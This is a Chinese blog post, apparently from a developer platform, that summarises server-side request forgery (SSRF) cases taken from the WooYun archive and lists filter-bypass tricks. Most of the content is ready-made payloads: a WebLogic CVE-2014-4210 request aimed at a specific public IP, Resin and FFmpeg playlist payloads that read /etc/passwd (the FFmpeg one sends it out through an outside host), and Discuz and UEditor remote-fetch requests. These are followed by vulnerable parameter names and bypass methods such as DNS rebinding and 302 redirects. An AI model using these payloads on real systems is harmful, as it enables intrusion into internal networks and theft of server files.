wooyun常见ssrf总结+常见ssrf绕过姿势

wooyun常见ssrf总结

前言

wooyun有很多旧时代知识沉淀,需要多看看,才能更好地迈向新时代。

0x01. weblogic

CVE-2014-4210

http://221.239.120.208/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.1.9.136&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

在这里插入图片描述

0x02. resin

http://xxxx/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd

在这里插入图片描述

0x03.xxe

解析xml的地方可能产生xxe漏洞,也能用于利用ssrf
在这里插入图片描述

0x04. ffmpg

早期ffmpg是存在ssrf漏洞的,现在应该基本没有了。
在这里插入图片描述
如果读取多行,可以用subfile

#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://val.com/header.m3u8|subfile,,start,0,end,31,,:///etc/passwd|subfile,,start,32,end,64,,:///etc/passwd|subfile,,start,65,end,97,,:///etc/passwd #EXT-X-ENDLIST 使用subfile

0x05.discuz

discuz一些版本存在ssrf

http://xxxx/bbs/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://xxxxxxxxxxxxxx.jpg[/img]&formhash=09cec465

3.x版本需要带上formhash
在这里插入图片描述

0x06.ueditor+dnsrebind

/editor/ueditor/php/controller.php?action=catchimage&source[]=http://my.ip/?aaa=1%26logo.png

在这里插入图片描述

0x07.常见的业务接口

剩下就是一些和业务相关的了,图片、下载、获取资源等

src_url=
sr=
url=
qrcodeUrl=
picPath=
source_url=
upfile=
img=
source=
pageurl=
remoteUrl=
path=
p=
key=
link=
domain=
apiurl=

0x08.绕过姿势

实战中用的比较多的是

1.@
2.xip.io
3.进制
4.302(短网址)
5.dnsrebind
6.unicode
7.wooyun看到有些人是这么绕的127.0.0.1a,可能是判定黑名单的在强制转换前面。
8.xss,有的后端会解析输入的js返回到前端,这里也是存在ssrf的可能的。可能位置在文档、渲染等地方
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值